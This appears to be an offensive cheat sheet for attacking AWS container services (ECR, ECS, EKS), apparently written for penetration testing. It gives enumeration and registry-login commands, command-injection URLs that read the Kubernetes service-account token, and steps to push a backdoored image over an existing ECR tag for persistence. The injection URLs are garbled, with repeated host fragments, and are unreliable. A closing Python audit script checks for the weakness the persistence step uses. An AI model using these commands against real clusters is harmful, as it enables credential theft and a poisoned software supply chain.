Containers

Containers exploitation

3 categories:

  • Registry: store and manage container images: ECR (Elastic Container Registry)

  • Orchestration: when and where containers run: ECS (Elastic Container Service) and EKS (Elastic Kubernetes Service)

  • Compute: run containers: Fargate (serverless compute engine) and EC2

Enumeration

ECR

Repositories in the container registry

aws ecr describe-repositories

Information about the repo policy

aws ecr get-repository-policy --repository-name [repo-name]

List all images in the specified repository

aws ecr list-images --repository-name [repo-name]

Information about a container image

aws ecr describe-images --repository-name [repo-name] --image-ids imageTag=[imageTag]

Authenticate to ECR

export AWS_ACCESS_KEY_ID="<access_key>"
export AWS_SECRET_ACCESS_KEY="<secret_key>"
aws ecr get-login-password --profile <profile_name> --region <region> | sudo docker login --username AWS --password-stdin <container_registry>

Pull Image from ECR

podman pull <registry>.dkr.ecr.<region>.amazonaws.com/<repository>

Create New Container

podman create --name route-optimization-container <registry>.dkr.ecr.<region>.amazonaws.com/<repository>:latest

Mount and Enumerate Container File System

podman unshare

podman mount <container-name> 

ECS

List all ECS clusters

aws ecs list-clusters

Information about specified cluster

aws ecs describe-clusters --clusters [cluster-name]

List all services in the specified cluster

aws ecs list-services --cluster [cluster-name]

Information about a specified service

aws ecs describe-services --cluster [cluster-name] --services [service-name]

Information about a specified task in the cluster

aws ecs describe-tasks --cluster [cluster-name] --tasks [task-arn]

List all container instances in the specified cluster

aws ecs list-container-instances --cluster [cluster-name]

EKS

List all EKS clusters

aws eks list-clusters

Information about a specified cluster

aws eks describe-cluster --name [cluster-name]

List of all node groups in a specified cluster

aws eks list-nodegroups --cluster-name [cluster-name]

Information about a specified node group in a cluster

aws eks describe-nodegroup --cluster-name [cluster-name] --nodegroup-name [node-group]

List all Fargate profiles in a specified cluster

aws eks list-fargate-profiles --cluster-name [cluster-name]

Information about a specific Fargate profile in a cluster

aws eks describe-fargate-profile --cluster-name [cluster-name] --fargate-profile-name [profile-name]

Initial Access

RCE - Command injection

  • List all secrets in the vulnerable EKS container

http://vulnerable.elb.amazonaws.com/?cmd=2.elb.amazonaws.com/?cmd=ls%20%20%20/var/run/secrets/kubernetes.io/serviceaccount
  • Get the secret information from the running vulnerable EKS container

http://vulnerable.elb.amazonaws.com/?cmd=2.elb.amazonaws.com/?cmd=2.elb.amazonaws.com/?cmd=cat%20%20%20/var/run/secrets/kubernetes.io/serviceaccount/token

Persistence

docker pull <ecr_registry>/<image>:latest
docker build -t <image> .
docker tag <image>:latest <ecr_registry>/<image>:latest
docker push <ecr_registry>/<image>:latest
  • Step by step

Authenticate docker daemon to ECR

export AWS_ACCESS_KEY_ID="<access_key>"
export AWS_SECRET_ACCESS_KEY="<secret_key>"
aws ecr get-login-password --profile <profile_name> --region <region> | sudo docker login --username AWS --password-stdin <container_registry>

aws ecr get-login-password --region [region] | docker login --username AWS --password-stdin [ECR-Addr]

Build backdoored docker image

docker build -t [Image-name] .

Tag the docker image

docker tag [Image-name] [ECR-addr]:[Image-name]

Push the docker image to AWS Container Registry

docker push [ECR-addr]:[Image-name]
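
Defender's check for the image-overwrite persistence above (added example, not part of the original page): it reads the JSON printed by `aws ecr describe-repositories` and `aws ecr get-repository-policy` and flags repositories where a tag such as `latest` can be replaced or where anyone may push. The repository names, sample JSON and finding labels are constructed for illustration.

```python
import json
from fnmatch import fnmatchcase

PUSH_ACTIONS = ("ecr:putimage", "ecr:initiatelayerupload",
                "ecr:uploadlayerpart", "ecr:completelayerupload")

# Constructed sample input (not real data), shaped like the CLI JSON output.
SAMPLE_REPOS = json.dumps({"repositories": [
    {"repositoryName": "app-api", "imageTagMutability": "MUTABLE",
     "imageScanningConfiguration": {"scanOnPush": False}},
    {"repositoryName": "app-worker", "imageTagMutability": "IMMUTABLE",
     "imageScanningConfiguration": {"scanOnPush": True}}]})
SAMPLE_POLICIES = {"app-api": json.dumps({"policyText": json.dumps({
    "Version": "2012-10-17", "Statement": [{
        "Effect": "Allow", "Principal": "*",
        "Action": ["ecr:BatchGetImage", "ecr:PutImage"]}]})})}

def as_list(value):
    return value if isinstance(value, list) else [value]

def open_push_statements(policy_output):
    """Allow statements that let any principal push (Condition keys ignored)."""
    policy = json.loads(json.loads(policy_output)["policyText"])
    hits = []
    for st in as_list(policy.get("Statement", [])):
        principal = st.get("Principal")
        anyone = principal == "*" or (
            isinstance(principal, dict) and "*" in as_list(principal.get("AWS", [])))
        patterns = [a.lower() for a in as_list(st.get("Action", []))]
        can_push = any(fnmatchcase(p, pat) for p in PUSH_ACTIONS for pat in patterns)
        if st.get("Effect") == "Allow" and anyone and can_push:
            hits.append(st)
    return hits

def audit(repos_output, policies):
    """Return (repository, finding) pairs for settings that ease image tampering."""
    findings = []
    for repo in json.loads(repos_output)["repositories"]:
        name = repo["repositoryName"]
        if repo.get("imageTagMutability") != "IMMUTABLE":
            findings.append((name, "tag-mutable"))      # :latest can be overwritten
        if not repo.get("imageScanningConfiguration", {}).get("scanOnPush"):
            findings.append((name, "no-scan-on-push"))
        if name in policies and open_push_statements(policies[name]):
            findings.append((name, "public-push"))
    return findings

if __name__ == "__main__":
    for name, finding in audit(SAMPLE_REPOS, SAMPLE_POLICIES):
        print(f"{name}: {finding}")
```

A `tag-mutable` finding is the setting the push step relies on; setting the repository to immutable tags and deploying by image digest removes it.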
